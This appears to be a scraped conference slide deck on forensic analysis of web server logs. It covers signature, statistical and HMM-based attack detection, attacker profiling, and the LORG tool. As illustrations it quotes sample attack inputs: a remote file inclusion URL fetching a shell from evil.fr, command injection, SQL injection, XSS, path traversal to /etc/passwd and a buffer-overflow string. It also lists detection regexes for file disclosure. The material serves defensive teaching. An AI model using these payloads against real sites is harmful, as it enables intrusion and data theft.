0% found this document useful (0 votes)
20 views28 pages

Web Applications Forensics

Learn Web Applications Forensics

Uploaded by

terence51272
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
20 views28 pages

Web Applications Forensics

Learn Web Applications Forensics

Uploaded by

terence51272
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 28

Web Application Forensics

HTTPD Logfile Security Analysis


Jens Müller, Ruhr University Bochum
[email protected]
Scenario

You got pwned


The Log File Problem

● Log files are huge. We are lazy.


● How find „important“ stuff?
● Still using grep/sed/awk?
● Why not use automated tools?
● Because we're simply lacking them right now!
What do we have?

Log Analytics,
Monitoring,
WAF/IDS
Forensics
Automated
● ModSecurity Web Log ● Piwik
● OWASP AppSensor Forensics ● AWstats
● PHPIDS ● GoAccess
● ... ● Splunk
● PyFlag
● ...

Why not combine both worlds?


Needle in a Haystack?

134.147.23.42 - - [13/Mar/2012:20:58:25 +0100] "GET


/webapp.php?page=news HTTP/1.1" 200 36312
134.147.61.15 - - [13/Mar/2012:21:02:13 +0100] "GET
/webapp.php?page=blog HTTP/1.1" 200 27140
134.147.12.77 - - [13/Mar/2012:20:58:25 +0100] "GET
/webapp.php?page=index HTTP/1.1" 200 30745
134.147.12.77 - - [13/Mar/2012:20:58:29 +0100] "GET
/webapp.php?page=news HTTP/1.1" 200 36312
212.32.45.167 - - [13/Mar/2012:21:05:42 +0100] "GET
/webapp.php?page=../../etc/passwd HTTP/1.1" 200 2219
134.147.12.131 - - [13/Mar/2012:20:58:29 +0100] "GET
/webapp.php?page=wiki HTTP/1.1" 200 73141
Various Kinds of Attacks...

● Remote File Inclusion: /include/?file=http://evil.fr/sh


● Command Execution: /lookup.jsp?ip=|+ls+-l
● SQL Injection: /product.asp?id=0%20or%201=1
● XSS (persistent): /forum.php?post=<script>alert(1);
● Buffer Overflow: /cgi-bin/Count.cgi?user=a
\x90\xbf8\xee\xff\xbf8\xee\xff
\xbf8\xee\xff\xbf8\xee\xff\xbf8
\xee\xff\xbf8 […] \xff\xff
● ...and many more
Attack Detection

● Two approaches: signature-based vs. learning-based

● Used Detection Modules :


→ Match against Regular Expressions („PHPIDS“)
→ Statistics based on Char Distribution („CHARS“)
→ Machine Learning based on HMM („MCSHMM“)
Signatures + Regular Expressions

● Signatures: [ADD00]
● RegEx: [MC08], [Hei08], [Fry11]

PHPIDS detection module:

Array of URL
query values → → Result
De-Obfuscation, Centrifuge Magic, RegEx Matching
Basic Statistics

● Length: [KV03]
● Char Distribution: [KV03], [WS04]

CHARS detection module:

P=
_____
μ|special chars|
|special chars|

(Probability of an URL query value beeing benign)


Machine Learning

● Bayes Estimatior: [CC04]


● Self-Organizing Maps: [VMV05], [Ste12]
● DFA: [ISBF07]
● Neural Networks: [GER09]
● Wavelet Transformations: [MdAN+ 11]
● N-grams: [Oza13]
● Hidden Markov Models: [CAG09], [AG10], [AG11],
[HTS11], [GJ12], [Choi13]
Hidden Markov Models

MCSHMM detection module:

● Aggregation: build Ensemble of HMMs for every URL query


string parameter of every web application (=path)
● Conversion: Values [a-Z] → 'A', [0-9] → 'N'
● Training Phase: Baum-Welch algorithm
● Testing Phase: Viterbi algorithm (returns Probability of an
URL query value like „/etc/passwd“ beeing benign)
● Apply MCS: Ensemble's highest Probability → best Result
Evaluation: Detection Modules

● Training Data: www.nds.rub.de, three weeks logs


● 63.000 requests altogether / 4.000 requests per day
● All incoming web traffic pre-filtered by a firewall with IPS
● considered attack free (in terms of measuring false-positives)

● Test Data: 40 real-world exploits obtained from various sources


(9 command execution, 9 LFI, 9 XSS/CSRF, 13 SQLi)
● payloads placed in five URL query values of two web apps
● using HTTP GET method for payload injection only!
Evaluation: Detection Modules
ROC-Kurve for www.nds.rub.de
The Missing Context...

Detection completed, still to much Data!

● Information about the Attacker


→ Group Activities into Sessions
→ Man-Machine Distinction
→ GeoIP, DNSBL Lookups

● Information about the Attack


→ Success Evaluation?
Man-machine Distinction

● Session Identification
● Types of Sessions
→ Random Scan? (least dangerous)
→ Targeted Scan? (more dangerous)
→ Human Attacker? (most dangerous)
● Related to Robot Detection Techniques
Man-machine distinction
Geomapping Visitors and Attacks
DNSBL Information

What info can be gathered about attackers' origins?

● Wanted for Spam (b.barracudacentral.org,


spam.dnsbl.sorbs.net, sbl.spamhaus.org)
● Botnet (xbl.spamhaus.org, zombie.dnsbl.sorbs.net)
● Open Proxies (dnsbl.proxybl.org, http.dnsbl.sorbs.net,
socks.dnsbl.sorbs.net)
● Tor Network Exit Node (tor.dnsbl.sectoor.de)
Success Evaluation

● Does yet another unsuccesful Scan matter?


→ No
● Did the attacker Succeed?
→ Define: What does „suceed“ mean?
→ Info Disclosure? File Disclosure? Compromise?
● Active Method: Replay Attacks, match for Signatures
Active Replay of Attacks

Signatures for File and Information Disclosure:

File disclosure: UNIX /etc/passwd → 'root:x:0:0:.+:[0-9a-zA-Z/]+'


File disclosure: PHP source code → '<? ?php(.*)?>'
File disclosure: Private keys → '-----BEGIN (D|R)SA PRIVATE KEY-----'
Info disclosure: PHP exception → 'PHP (Notice|Warning|Error)'
Info disclosure: Java IO exception → 'java.io.FileNotFoundException: '
Info disclosure: Python IO exception → 'Traceback (most recent call last):'
Info disclosure: file system path → 'Call to undefined function.*() in /'
Info disclosure: web root path → ': failed to open stream: '
Info disclosure: MySQL error → 'DBD::mysql::(db|st)(.*)failed'
Wait, active Methods are to easy...

● How to evaluate the Success of Attacks


given Log File information alone?
134.147.23.42 - - [13/Mar/2012:20:58:25 +0100]
"GET /webapp.php?page=news HTTP/1.1" 200 36312
134.147.61.15 - - [13/Mar/2012:21:02:13 +0100]
"GET /webapp.php?page=blog HTTP/1.1" 200 27140
134.147.12.77 - - [13/Mar/2012:20:58:25 +0100]
"GET /webapp.php?page=index HTTP/1.1" 200 30745
● Any ideas?
HTTP Response Codes

134.147.23.42 - - [13/Mar/2012:20:58:25 +0100] "GET


/webapp.php?page=news HTTP/1.1" 200 36312
134.147.61.15 - - [13/Mar/2012:21:02:13 +0100] "GET
/webapp.php?page=blog HTTP/1.1" 200 27140
134.147.12.77 - - [13/Mar/2012:20:58:25 +0100] "GET
/webapp.php?page=index HTTP/1.1" 200 30745
134.147.12.77 - - [13/Mar/2012:20:58:29 +0100] "GET
/webapp.php?page=news HTTP/1.1" 200 36312
212.32.45.167 - - [13/Mar/2012:21:05:42 +0100] "GET
/webapp.php?page=../../etc/passwd HTTP/1.1" 200 2219
134.147.12.131 - - [13/Mar/2012:20:58:29 +0100] "GET
/webapp.php?page=wiki HTTP/1.1" 200 73141
HTTP Response Codes

...do not provide to much Information:

● 404 → unsuccessful scan?


● 401 | 403 → unsuccessful login
● 400 | 408 | 503 → denial of service?
● 500 → buffer overflow?
● 414 → unsuccessful buffer overflow?
Bytes-sent Outliers

● What about this: Outliers in „bytes-sent“ field


● Problem: Dynamic Content might produce various
Hotspots → we need a density-based Algorithm!
● Local outlier Factor (LoF)
● Experimental; produces a high false-positive Rate, but
we do this only on Requests detected as Attacks...
Outliers in bytes-sent

134.147.23.42 - - [13/Mar/2012:20:58:25 +0100] "GET


/webapp.php?page=news HTTP/1.1" 200 36312
134.147.61.15 - - [13/Mar/2012:21:02:13 +0100] "GET
/webapp.php?page=blog HTTP/1.1" 200 27140
134.147.12.77 - - [13/Mar/2012:20:58:25 +0100] "GET
/webapp.php?page=index HTTP/1.1" 200 30745
134.147.12.77 - - [13/Mar/2012:20:58:29 +0100] "GET
/webapp.php?page=news HTTP/1.1" 200 36312
212.32.45.167 - - [13/Mar/2012:21:05:42 +0100] "GET
/webapp.php?page=../../etc/passwd HTTP/1.1" 200 2219
134.147.12.131 - - [13/Mar/2012:20:58:29 +0100] "GET
/webapp.php?page=wiki HTTP/1.1" 200 73141
Visualization: LORG in Action

Nothing to see here, move on...


Evasion Techniques + Unresolved Issues

● Attack-based
→ Training Data Poisoning: Mitigation of learning-based Detection
→ Payload Obfuscation (urlencode, UTF-7 Entities, JS Unicode, ...)
→ Use Attack Vectors not logged or not visible (POST, DOM-XSS)
→ Hide attack flow in various, separate Steps or in Mass of „Noise“

● Logfile-based
→ Manipulation of Log Files (got r00t?)
→ Denial of Service Log Server (or send 0x1A to Apache 1.3)
→ Log Flooding: reach End of Disk or overwrite Logs (Rotation)
Thanks for your Attention...

Source Code
● LORG („Logfile Outlier Recognition and Gathering“)
http://github.com/jensvoid/lorg (GPL2; pre-alpha PoC!)

Questions?

You might also like